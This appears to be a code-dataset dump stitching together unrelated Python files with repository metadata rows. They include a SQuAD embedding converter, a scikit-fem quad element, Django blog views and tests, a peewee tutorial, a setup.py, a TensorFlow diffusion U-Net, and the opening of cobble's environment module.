class SQUADConverterEMB(BaseFormatConverter):
__provider__ = "squad_emb"
annotation_types = (QuestionAnsweringEmbeddingAnnotation, )
@classmethod
def parameters(cls):
configuration_parameters = super().parameters()
configuration_parameters.update({
'testing_file': PathField(description="Path to testing file."),
'vocab_file': PathField(description='Path to vocabulary file.'),
'max_seq_length': NumberField(
description='The maximum total input sequence length after WordPiece tokenization.',
optional=True, default=128, value_type=int
),
'max_query_length': NumberField(
description='The maximum number of tokens for the question.',
optional=True, default=64, value_type=int
),
'lower_case': BoolField(optional=True, default=False, description='Switch tokens to lower case register')
})
return configuration_parameters
def configure(self):
self.testing_file = self.get_value_from_config('testing_file')
self.max_seq_length = int(self.get_value_from_config('max_seq_length'))
self.max_query_length = self.get_value_from_config('max_query_length')
self.lower_case = self.get_value_from_config('lower_case')
vocab_file = str(self.get_value_from_config('vocab_file'))
with open(vocab_file, "r", encoding="utf-8") as r:
self.vocab = {t.rstrip("\n"): i for i, t in enumerate(r.readlines())}
def convert(self, check_content=False, progress_callback=None, progress_interval=100, **kwargs):
squad = read_json(self.testing_file)
N = len(squad['data'])
with multiprocessing.Pool() as pool:
squad['data'] = pool.starmap(
encode_squad_article,
zip(squad['data'], [self.vocab] * N, [self.lower_case] * N)
)
pad = [self.vocab["[PAD]"]]
cls = [self.vocab["[CLS]"]]
sep = [self.vocab["[SEP]"]]
index_ref = [0]
def add_sample(ids, max_len, context_pos_id, annotations):
ids_len = min(max_len - 2, len(ids))
ids = ids[:ids_len]
rest = max_len - (ids_len + 2)
assert rest >= 0
annotations.append(QuestionAnsweringEmbeddingAnnotation(
['{}_{}'.format(n, index_ref[0]) for n in ('input_ids', 'input_mask', 'segment_ids', 'position_ids')],
np.array(cls + ids + sep + pad * rest),
np.array([1] * (1 + ids_len + 1) + pad * rest),
np.array([0] * (1 + ids_len + 1) + pad * rest),
np.arange(max_len),
context_pos_id
))
index_ref[0] += 1
c_annos = []
q_annos = []
for article in squad['data']:
for par in article['paragraphs']:
add_sample(
par['context_enc'],
self.max_seq_length,
None,
c_annos)
for qa in par['qas']:
add_sample(
qa['question_enc'],
self.max_query_length,
c_annos[-1].identifier,
q_annos)
return ConverterReturn(c_annos+q_annos, None, None)
| 35.520833
| 118
| 0.596481
|
ec08c455d9f40119cd7d9791e94ecd98206f4975
| 847
|
py
|
Python
|
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
skfem/element/element_quad/element_quad1.py
|
YerbaPage/scikit-fem
|
e5140e0648e4a0f1ea0b60de90851ab49d369453
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from ..element_h1 import ElementH1
from ...mesh.mesh2d import MeshQuad
class ElementQuad1(ElementH1):
nodal_dofs = 1
dim = 2
maxdeg = 2
dofnames = ['u']
doflocs = np.array([[0., 0.],
[1., 0.],
[1., 1.],
[0., 1.]])
mesh_type = MeshQuad
def lbasis(self, X, i):
x, y = X
if i == 0:
phi = (1. - x) * (1. - y)
dphi = np.array([-1. + y, -1. + x])
elif i == 1:
phi = x * (1. - y)
dphi = np.array([1. - y, -x])
elif i == 2:
phi = x * y
dphi = np.array([y, x])
elif i == 3:
phi = (1. - x) * y
dphi = np.array([-y, 1. - x])
else:
self._index_error()
return phi, dphi
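    # Note: phi above are the four standard bilinear shape functions on the
    # reference square [0, 1]^2: they sum to 1 everywhere and each equals 1 at
    # its own node in doflocs and 0 at the other three.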
| 22.289474
| 47
| 0.378985
|
778e7c20944ec3673b761010e0bded567b235394
| 644
|
py
|
Python
|
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | 6
|
2019-11-21T10:09:49.000Z
|
2021-06-19T09:52:59.000Z
|
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
client/checkout/tests/test_models.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import TestCase, RequestFactory
# models test
class UserProfileTest(TestCase):
"""
Test whether user profile is created after user creation
"""
def setUp(self):
# Every test needs access to the request factory.
self.request = RequestFactory().get("/")
# create a user instance
self.user = get_user_model().objects.create_user(
username='john',
email='johndoe@gmail.com',
password='password'
)
def test_create_userprofile(self):
self.assertIsNotNone(self.user.userprofile)
| 28
| 60
| 0.656832
|
97650773dfeda2d22c5ef85e68c07b2233eb467b
| 2,123
|
py
|
Python
|
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | null | null | null |
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | null | null | null |
setup.py
|
CAM-Gerlach/ivaldi
|
07fa74ac328d3caae6e1e9811f649178eda01925
|
[
"MIT"
] | 1
|
2020-02-18T04:40:06.000Z
|
2020-02-18T04:40:06.000Z
|
#!/usr/bin/env python3
"""
Setup script for Ivaldi.
"""
# Standard library imports
from pathlib import Path
# Third party imports
import setuptools
PROJECT_NAME = "ivaldi"
with open(Path(__file__).resolve().parent / "README.md",
"r", encoding="utf-8") as readme_file:
LONG_DESCRIPTION = readme_file.read()
VERSION = {}
with open(Path(__file__).resolve().parent
/ "src" / PROJECT_NAME / "_version.py",
"r", encoding="utf-8") as version_file:
exec(version_file.read(), VERSION) # pylint: disable=W0122
setuptools.setup(
name=PROJECT_NAME,
version=VERSION["__version__"],
author="C.A.M. Gerlach",
author_email="CAM.Gerlach@Gerlach.CAM",
description=("A lightweight client for IoT data logging and uplink."),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
keywords="iot sensor remote control research m2m raspberry pi adafruit",
url="https://github.com/hamma-dev/ivaldi",
packages=setuptools.find_packages("src"),
package_dir={"": "src"},
python_requires=">=3.6",
install_requires=[
"adafruit-circuitpython-ads1x15",
"adafruit-circuitpython-bmp280",
"adafruit-circuitpython-sht31d",
"gpiozero",
"pyserial",
"RPi.GPIO",
],
entry_points={
"console_scripts": [
f"{PROJECT_NAME}={PROJECT_NAME}.__main__:main"]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Environment :: No Input/Output (Daemon)",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering :: Atmospheric Science",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: System :: Monitoring",
"Topic :: System :: Networking :: Monitoring :: Hardware Watchdog",
],
)
| 31.220588
| 76
| 0.628356
|
1b032d7df048e879cb131d3ededb5f240f3327c2
| 1,266
|
py
|
Python
|
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
db_tutorial.py
|
Gerard-007/diaryApp
|
2245cb2c6cca763112f68aba1ac1f7d7ebccd9b7
|
[
"MIT"
] | null | null | null |
from peewee import *
db = SqliteDatabase("students.db")
class Student(Model):
username = CharField(max_length=255, unique=True)
points = IntegerField(default=0)
class Meta:
database = db
# student records stored as a list of dictionaries...
students = [
{'username': 'Gerard',
'points': 2000},
{'username': 'Blessing',
'points': 1200},
{'username': 'StefNora',
'points': 3000},
{'username': 'Luke',
'points': 2300}
]
def add_students():
for student in students:
try:
Student.create(username = student['username'],
points = student['points'])
except IntegrityError:
student_record = Student.get(username=student['username'])
student_record.points = student['points']
student_record.save()
def top_student():
    # Select all student records, order them by points (highest first), and get only the first record
student = Student.select().order_by(Student.points.desc()).get()
return student.username
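# e.g. with the seed data above, top_student() returns 'StefNora' (3000 points)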
# This block runs the program logic
if __name__ == '__main__':
db.connect()
db.create_tables([Student], safe=True)
add_students()
print("The top student now is: {}".format(top_student()))
| 26.375
| 85
| 0.611374
|
d52f3bcf4e4d1093fc0e3387a628fa0b55258166
| 840
|
py
|
Python
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | 2
|
2019-06-26T12:33:32.000Z
|
2019-06-26T21:22:10.000Z
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | 6
|
2019-12-04T22:58:04.000Z
|
2022-02-10T13:17:09.000Z
|
core/frontend/migrations/0001_initial.py
|
LegolasVzla/django-rest-framework-orientdb-postgresql
|
e7c412bd905a91210bfe863f31fea9ec78fe830e
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.1 on 2019-06-06 20:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500)),
('email', models.CharField(blank=True, max_length=500)),
('is_active', models.BooleanField(default=True)),
('is_deleted', models.BooleanField(default=False)),
('created_date', models.DateTimeField(auto_now_add=True)),
('updated_date', models.DateTimeField(auto_now=True)),
],
),
]
| 31.111111
| 114
| 0.583333
|
fe24fa6a6769a9b1801bf76760dbe392386f6963
| 15,181
|
py
|
Python
|
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | 6
|
2021-06-02T04:48:20.000Z
|
2022-02-02T10:19:07.000Z
|
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | null | null | null |
ddpm/src/modules/models1.py
|
an-seunghwan/generative
|
edba5999677e80178f0a3ecd091f1800396ebcef
|
[
"MIT"
] | null | null | null |
#%%
'''
Fixed:
tfa.layers.GroupNormalization(1) -> layers.LayerNormalization()
'''
#%%
import tensorflow as tf
import tensorflow.keras as K
from tensorflow.keras import layers
import numpy as np
# import tensorflow_addons as tfa
#%%
# def nonlinearity(x):
# return tf.nn.swish(x)
#%%
# # FIXME
# def normalize(x):
# return tfa.layers.GroupNormalization(1)(x)
# return layers.LayerNormalization()(x)
#%%
class Upsampling(layers.Layer):
def __init__(self, in_ch, with_conv):
super(Upsampling, self).__init__()
self.in_ch = in_ch
self.with_conv = with_conv
self.conv = layers.Conv2D(filters=self.in_ch, kernel_size=3, strides=1, padding='same', name='conv_up')
def call(self, x, **kwargs):
B, H, W, C = x.shape
x = tf.image.resize(x, size=[H * 2, W * 2], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
# assert x.shape == [B, H * 2, W * 2, C]
if self.with_conv:
x = self.conv(x)
# assert x.shape == [B, H * 2, W * 2, C]
return x
#%%
class Downsampling(layers.Layer):
def __init__(self, in_ch, with_conv):
super(Downsampling, self).__init__()
self.in_ch = in_ch
self.with_conv = with_conv
if self.with_conv:
self.conv = layers.Conv2D(filters=self.in_ch, kernel_size=3, strides=2, padding='same', name='conv_down')
else:
self.avgpool = layers.AveragePooling2D(pool_size=(2, 2), strides=2)
def call(self, x, **kwargs):
# B, H, W, C = x.shape
if self.with_conv:
x = self.conv(x)
else:
x = self.avgpool(x)
# assert x.shape == [B, H // 2, W // 2, C]
return x
#%%
def get_timestep_embedding(timesteps, embedding_dim):
"""
From Fairseq.
Build sinusoidal embeddings.
This matches the implementation in tensor2tensor, but differs slightly
from the description in Section 3.5 of "Attention Is All You Need".
"""
assert len(timesteps.shape) == 1 # and timesteps.dtype == tf.int32
half_dim = embedding_dim // 2
emb = tf.math.log(10000.0) / (half_dim - 1)
emb = tf.exp(tf.range(half_dim, dtype=tf.float32) * -emb)
emb = tf.cast(timesteps, dtype=tf.float32)[:, None] * emb[None, :]
emb = tf.concat([tf.sin(emb), tf.cos(emb)], axis=1)
if embedding_dim % 2 == 1: # zero pad
emb = tf.pad(emb, [[0, 0], [0, 1]])
# assert emb.shape == [timesteps.shape[0], embedding_dim]
return emb
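# Shape sketch: get_timestep_embedding(tf.range(4, dtype=tf.float32), 8) returns
# a (4, 8) tensor, sin components in the first four columns and cos in the last
# four, matching the commented-out shape assert above.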
#%%
class ResnetBlock(layers.Layer):
def __init__(self, dropout, in_ch, out_ch=None):
super(ResnetBlock, self).__init__()
self.dropout = dropout
self.in_ch = in_ch
self.out_ch = out_ch
if self.out_ch is None:
self.out_ch = self.in_ch
if self.out_ch != self.in_ch:
self.shortcut = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv_shortcut')
# self.nonlinearity = nonlinearity
# self.normalize1 = tfa.layers.GroupNormalization(1)
# self.normalize2 = tfa.layers.GroupNormalization(1)
self.normalize1 = layers.LayerNormalization()
self.normalize2 = layers.LayerNormalization()
self.conv1 = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv1')
self.temb_proj = layers.Dense(self.out_ch, name='temb_proj')
self.dropout_layer = layers.Dropout(rate=self.dropout)
self.conv2 = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv2')
def call(self, x, temb, **kwargs):
h = x
h = tf.nn.swish(self.normalize1(h))
h = self.conv1(h)
# add in timestep embedding
h += self.temb_proj(tf.nn.swish(temb))[:, None, None, :]
h = tf.nn.swish(self.normalize2(h))
h = self.dropout_layer(h)
h = self.conv2(h)
if self.out_ch != self.in_ch:
x = self.shortcut(x)
# assert x.shape == h.shape
return x + h
#%%
class AttentionBlock(layers.Layer):
def __init__(self, in_ch):
super(AttentionBlock, self).__init__()
self.in_ch = in_ch
# self.normalize = tfa.layers.GroupNormalization(1)
self.normalize = layers.LayerNormalization()
self.q_layer = layers.Dense(self.in_ch, name='q')
self.k_layer = layers.Dense(self.in_ch, name='k')
self.v_layer = layers.Dense(self.in_ch, name='v')
self.proj_out = layers.Dense(self.in_ch, name='proj_out')
def call(self, x, **kwargs):
B, H, W, C = x.shape
h = self.normalize(x)
q = self.q_layer(h)
k = self.k_layer(h)
v = self.v_layer(h)
w = tf.einsum('bhwc,bHWc->bhwHW', q, k) * (int(self.in_ch) ** (-0.5))
w = tf.reshape(w, [-1, H, W, H * W])
w = tf.nn.softmax(w, -1)
w = tf.reshape(w, [-1, H, W, H, W])
h = tf.einsum('bhwHW,bHWc->bhwc', w, v)
h = self.proj_out(h)
# assert h.shape == x.shape
return x + h
#%%
def build_unet(PARAMS, embedding_dim, dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=4, attn_resolutions=(16, ), resamp_with_conv=True):
x = layers.Input((PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']))
timesteps = layers.Input(())
num_resolutions = len(embedding_dim_mult)
'''Timestep embedding'''
temb = get_timestep_embedding(timesteps, embedding_dim)
temb = layers.Dense(embedding_dim * 4, name='dense0')(temb)
temb = layers.Dense(embedding_dim * 4, name='dense1')(tf.nn.swish(temb))
# assert temb.shape == [B, self.embedding_dim * 4]
'''Downsampling'''
hs = [layers.Conv2D(filters=embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')(x)]
for i_level in range(num_resolutions):
# Residual blocks for this resolution
for i_block in range(num_res_blocks):
h = ResnetBlock(dropout=dropout, in_ch=hs[-1].shape[-1], out_ch=embedding_dim * embedding_dim_mult[i_level])(hs[-1], temb=temb)
if h.shape[1] in attn_resolutions:
h = AttentionBlock(in_ch=h.shape[-1])(h)
hs.append(h)
# Downsample
if i_level != num_resolutions - 1:
hs.append(Downsampling(in_ch=hs[-1].shape[-1], with_conv=resamp_with_conv)(hs[-1]))
'''Middle'''
h = hs[-1]
h = ResnetBlock(dropout=dropout, in_ch=embedding_dim * embedding_dim_mult[-1], out_ch=None)(h, temb=temb)
h = AttentionBlock(in_ch=h.shape[-1])(h)
h = ResnetBlock(dropout=dropout, in_ch=embedding_dim * embedding_dim_mult[-1], out_ch=None)(h, temb=temb)
'''Upsampling'''
for i_level in reversed(range(num_resolutions)):
# Residual blocks for this resolution
for i_block in range(num_res_blocks + 1):
h = tf.concat([h, hs.pop()], axis=-1)
h = ResnetBlock(dropout=dropout, in_ch=h.shape[-1], out_ch=embedding_dim * embedding_dim_mult[i_level])(h, temb=temb)
if h.shape[1] in attn_resolutions:
h = AttentionBlock(in_ch=h.shape[-1])(h)
# Upsample
if i_level != 0:
h = Upsampling(in_ch=h.shape[-1], with_conv=resamp_with_conv)(h)
'''End'''
# h = tf.nn.swish(tfa.layers.GroupNormalization(1)(h))
h = tf.nn.swish(layers.LayerNormalization()(h))
h = layers.Conv2D(filters=PARAMS['channel'], kernel_size=3, strides=1, padding='same', name='conv_out')(h)
# assert h.shape == x.shape[:3] + [self.out_ch]
model = K.models.Model([x, timesteps], h)
model.summary()
return model
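# Illustrative call (PARAMS keys inferred from the usage above, values are
# placeholders): build_unet({'data_dim': 32, 'channel': 3}, embedding_dim=64)
# returns a Keras model taking [image, timesteps] inputs and producing an output
# with the same spatial size and channel count as the image.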
#%%
# class Unet(K.models.Model):
# def __init__(self, params, embedding_dim, out_ch, dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), resamp_with_conv=True):
# super(Unet, self).__init__()
# self.params = params
# self.embedding_dim = embedding_dim
# self.out_ch = out_ch
# self.dropout = dropout
# self.embedding_dim_mult = embedding_dim_mult
# self.num_res_blocks = num_res_blocks
# self.attn_resolutions = attn_resolutions
# self.resamp_with_conv = resamp_with_conv
# self.num_resolutions = len(self.embedding_dim_mult)
# self.nonlinearity = nonlinearity
# self.normalize = normalize
# self.get_timestep_embedding = get_timestep_embedding
# self.channel_mult = [embedding_dim * m for m in self.embedding_dim_mult]
# '''Downsampling'''
# self.resblocks_down = [ResnetBlock(dropout=self.dropout, C=self.channel_mult[i], out_ch=self.embedding_dim * self.embedding_dim_mult[i])
# for i in range(self.num_resolutions)]
# self.attnblocks_down = AttentionBlock(C=self.attn_resolutions[0])
# self.downsamples_down = [Downsampling(C=self.channel_mult[i], with_conv=self.resamp_with_conv)
# for i in range(self.num_resolutions-1)]
# '''Middle'''
# self.resnet_middle1 = ResnetBlock(dropout=self.dropout, C=self.channel_mult[-1], out_ch=None)
# self.attnblock_middle = AttentionBlock(C=int(self.params['data_dim'] / (2 ** (self.num_resolutions - 1))))
# self.resnet_middle2 = ResnetBlock(dropout=self.dropout, C=self.channel_mult[-1], out_ch=None)
# '''Upsampling'''
# self.resblocks_up = [ResnetBlock(dropout=self.dropout, C=self.channel_mult[::-1][i], out_ch=self.embedding_dim * self.embedding_dim_mult[i])
# for i in range(self.num_resolutions)]
# self.attnblocks_up = AttentionBlock(C=self.attn_resolutions[0])
# self.Upsamples_up = [Upsampling(C=self.channel_mult[::-1][i], with_conv=self.resamp_with_conv)
# for i in range(self.num_resolutions-1)]
# self.dense0 = layers.Dense(self.embedding_dim * 4, name='dense0')
# self.dense1 = layers.Dense(self.embedding_dim * 4, name='dense1')
# self.conv_in = layers.Conv2D(filters=self.embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')
# self.conv_out = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv_out')
# def call(self, x, timesteps, **kwargs):
# # B, _, _, _ = tf.shape(x)
# B = self.params['batch_size']
# '''Timestep embedding'''
# temb = self.get_timestep_embedding(timesteps, self.embedding_dim)
# temb = self.dense0(temb)
# temb = self.dense1(nonlinearity(temb))
# # assert temb.shape == [B, self.embedding_dim * 4]
# '''Downsampling'''
# hs = [self.conv_in(x)]
# for i_level in range(self.num_resolutions):
# # Residual blocks for this resolution
# for i_block in range(self.num_res_blocks):
# h = self.resblocks_down[i_block](hs[-1], temb=temb)
# if h.shape[1] in self.attn_resolutions:
# h = self.attnblocks_down(h)
# hs.append(h)
# # Downsample
# if i_level != self.num_resolutions - 1:
# hs.append(self.downsamples_down[i_level](hs[-1]))
# '''Middle'''
# h = hs[-1]
# h = self.resnet_middle1(h, temb=temb)
# h = self.attnblock_middle(h)
# h = self.resnet_middle2(h, temb=temb)
# '''Upsampling'''
# for i_level in reversed(range(self.num_resolutions)):
# # Residual blocks for this resolution
# for i_block in range(self.num_res_blocks + 1):
# h = self.resblocks_up[i_block](tf.concat([h, hs.pop()], axis=-1), temb=temb)
# if h.shape[1] in self.attn_resolutions:
# h = self.attnblocks_up(h)
# # Upsample
# if i_level != 0:
# h = self.Upsamples_up[i_block](h)
# '''End'''
# h = self.nonlinearity(self.normalize(h))
# h = self.conv_out(h)
# # h = nn.conv2d(h, name='conv_out', num_units=out_ch, init_scale=0.)
# # assert h.shape == x.shape[:3] + [self.out_ch]
# return h
#%%
# def model(x, timesteps, embedding_dim, out_ch,
# dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=3, attn_resolutions=(16, ), resamp_with_conv=True):
# # x = layers.Input((32, 32, 3))
# # timesteps = layers.Input(())
# B, _, _, _ = tf.shape(x)
# num_resolutions = len(embedding_dim_mult)
# '''Timestep embedding'''
# temb = get_timestep_embedding(timesteps, embedding_dim)
# temb = layers.Dense(embedding_dim * 4, name='dense0')(temb)
# # temb = nn.dense(temb, name='dense0', num_units=ch * 4)
# temb = layers.Dense(embedding_dim * 4, name='dense1')(nonlinearity(temb))
# # temb = nn.dense(nonlinearity(temb), name='dense1', num_units=ch * 4)
# assert temb.shape == [B, embedding_dim * 4]
# '''Downsampling'''
# hs = [layers.Conv2D(filters=embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')(x)]
# # hs = [nn.conv2d(x, name='conv_in', num_units=ch)]
# for i_level in range(num_resolutions):
# # Residual blocks for this resolution
# for i_block in range(num_res_blocks):
# h = resnet_block(hs[-1], temb=temb, out_ch=embedding_dim * embedding_dim_mult[i_level], dropout=dropout)
# # h = resnet_block(hs[-1], name='block_{}'.format(i_block), temb=temb, out_ch=ch * ch_mult[i_level], dropout=dropout)
# if tf.shape(h)[1] in attn_resolutions:
# h = attn_block(h)
# hs.append(h)
# # Downsample
# if i_level != num_resolutions - 1:
# hs.append(downsample(hs[-1], with_conv=resamp_with_conv))
# '''Middle'''
# h = hs[-1]
# h = resnet_block(h, temb=temb, dropout=dropout)
# # h = resnet_block(h, temb=temb, name='block_1', dropout=dropout)
# h = attn_block(h)
# # h = attn_block(h, name='attn_1'.format(i_block), temb=temb)
# h = resnet_block(h, temb=temb, dropout=dropout)
# # h = resnet_block(h, temb=temb, name='block_2', dropout=dropout)
# '''Upsampling'''
# for i_level in reversed(range(num_resolutions)):
# # Residual blocks for this resolution
# for i_block in range(num_res_blocks + 1):
# h = resnet_block(tf.concat([h, hs.pop()], axis=-1), temb=temb, out_ch=embedding_dim * embedding_dim_mult[i_level], dropout=dropout)
# if tf.shape(h)[1] in attn_resolutions:
# h = attn_block(h)
# # Upsample
# if i_level != 0:
# h = upsample(h, with_conv=resamp_with_conv)
# '''End'''
# h = nonlinearity(normalize(h))
# h = layers.Conv2D(filters=out_ch, kernel_size=3, strides=1, padding='same', name='conv_out')(h)
# # h = nn.conv2d(h, name='conv_out', num_units=out_ch, init_scale=0.)
# assert h.shape == x.shape[:3] + [out_ch]
# return h
# # return K.models.Model([x, timesteps], h)
#%%
| 42.643258
| 167
| 0.600883
|
a556b4fcb1cb8fe2debced0b417597ffb87d3059
| 2,882
|
py
|
Python
|
blog/views.py
|
chiraag-kakar/My-Django-Blog
|
af4a56bd678cd0800473be718304c589f1b53904
|
[
"MIT"
] | 5
|
2020-08-28T07:01:32.000Z
|
2020-12-14T00:29:01.000Z
|
blog/views.py
|
Favy-source/My-BlogTask
|
dd6ed005f9a10f2d658a55c597c89cd0a65cbf3c
|
[
"MIT"
] | null | null | null |
blog/views.py
|
Favy-source/My-BlogTask
|
dd6ed005f9a10f2d658a55c597c89cd0a65cbf3c
|
[
"MIT"
] | 4
|
2020-11-10T17:51:19.000Z
|
2021-05-13T13:55:40.000Z
|
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .models import Post, Comment
from django.shortcuts import redirect
from django.contrib.auth.decorators import login_required
from .forms import PostForm, CommentForm
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
return render(request, 'blog/post_detail.html', {'post': post})
def post_list(request):
posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts': posts})
@login_required
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
# post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
# post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_draft_list(request):
posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')
return render(request, 'blog/post_draft_list.html', {'posts': posts})
@login_required
def post_publish(request, pk):
post = get_object_or_404(Post, pk=pk)
post.publish()
return redirect('post_detail', pk=pk)
@login_required
def post_remove(request, pk):
post = get_object_or_404(Post, pk=pk)
post.delete()
return redirect('post_list')
def add_comment_to_post(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.post = post
comment.save()
return redirect('post_detail', pk=post.pk)
else:
form = CommentForm()
return render(request, 'blog/add_comment_to_post.html', {'form': form})
@login_required
def comment_approve(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.approve()
return redirect('post_detail', pk=comment.post.pk)
@login_required
def comment_remove(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.delete()
return redirect('post_detail', pk=comment.post.pk)
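# The redirect() calls above assume named routes such as 'post_detail' and 'post_list'.
# A minimal blog/urls.py sketch wiring these views up is shown below for reference;
# only the route names 'post_detail' and 'post_list' are taken from this file, the
# URL paths and the remaining route names are assumptions.
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.post_list, name='post_list'),
#     path('post/<int:pk>/', views.post_detail, name='post_detail'),
#     path('post/new/', views.post_new, name='post_new'),
#     path('post/<int:pk>/edit/', views.post_edit, name='post_edit'),
#     path('drafts/', views.post_draft_list, name='post_draft_list'),
#     path('post/<int:pk>/publish/', views.post_publish, name='post_publish'),
#     path('post/<int:pk>/remove/', views.post_remove, name='post_remove'),
#     path('post/<int:pk>/comment/', views.add_comment_to_post, name='add_comment_to_post'),
#     path('comment/<int:pk>/approve/', views.comment_approve, name='comment_approve'),
#     path('comment/<int:pk>/remove/', views.comment_remove, name='comment_remove'),
# ]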
| 32.75
| 94
| 0.672797
|
4db4af00edf4a7b4a446748ec68b0f4a38ef5e96
| 21,615
|
py
|
Python
|
src/cobble/env.py
|
cbiffle/cobble-build
|
8cd2bc1d03c1d41a2f25ae6b064ab6dafd6016e4
|
[
"BSD-2-Clause"
] | 9
|
2015-09-08T14:35:40.000Z
|
2021-09-27T23:24:19.000Z
|
src/cobble/env.py
|
oxidecomputer/cobble-build
|
e98052fd15d7718950155d595c6d8e07e3f4531e
|
[
"BSD-2-Clause"
] | 1
|
2021-01-07T01:53:22.000Z
|
2021-11-03T13:18:24.000Z
|
src/cobble/env.py
|
cbiffle/cobble-build
|
8cd2bc1d03c1d41a2f25ae6b064ab6dafd6016e4
|
[
"BSD-2-Clause"
] | 2
|
2020-03-12T22:04:12.000Z
|
2020-12-21T20:15:25.000Z
|
"""Environments and supporting types.
An *environment* in Cobble is an immutable key-value mapping, similar to a
Python dict. The contents of environments are restricted, however, in two ways:
1. Each environment is associated with a `KeyRegistry`, and any key used in the
environment must be registered before use.
2. The values that can be stored in the environment are different for each key,
but are generally limited to simple Python data: lists, tuples, sets,
strings, and booleans.
Cobble targets may produce different build steps in different environments --
for example, a C binary can be built in several different environments, each of
which gives a slightly different value for the `c_flags` key.
"""
import hashlib
import pickle
import string
import types
from inspect import signature
from functools import reduce
class EnvKey:
"""Represents a key that can be used in environments.
This is the definition of a key that gets stored with the `KeyRegistry`.
"""
def __init__(self, name, *,
from_literal = None,
combine = None,
default = None,
readout = None,
help = None):
"""Creates a key with a name and strategy functions.
The strategy functions are:
- from_literal: used to translate a literal written in a BUILD file to
the appropriate internal value type. If `None`, any literal is
accepted.
- combine: used to merge different values for the same key. If `None`,
different values are an error condition. If the combine function
returns `None`, the key is deleted.
- default: value to be read when an environment doesn't have a value
for the key.
- readout: used to prepare a value for processing. Can be omitted if no
preparation (beyond from_literal/combine) is needed.
'help' optionally gives a message explaining what the key is for, which
will be printed if it is required but not found.
"""
self.name = name
self._from_literal = from_literal
self._combine = combine
self._default = freeze(default)
self._readout = readout
self.help = help
def from_literal(self, literal):
"""Produces a value legal for this key from `literal`, or throws."""
if self._from_literal is not None:
return self._from_literal(literal)
else:
return literal
def combine(self, lhs, rhs):
"""Combines two values for this key, or throws if they can't be
combined."""
assert self._combine is not None, (
"Environment key %s requires a unique value, got two: %r and %r"
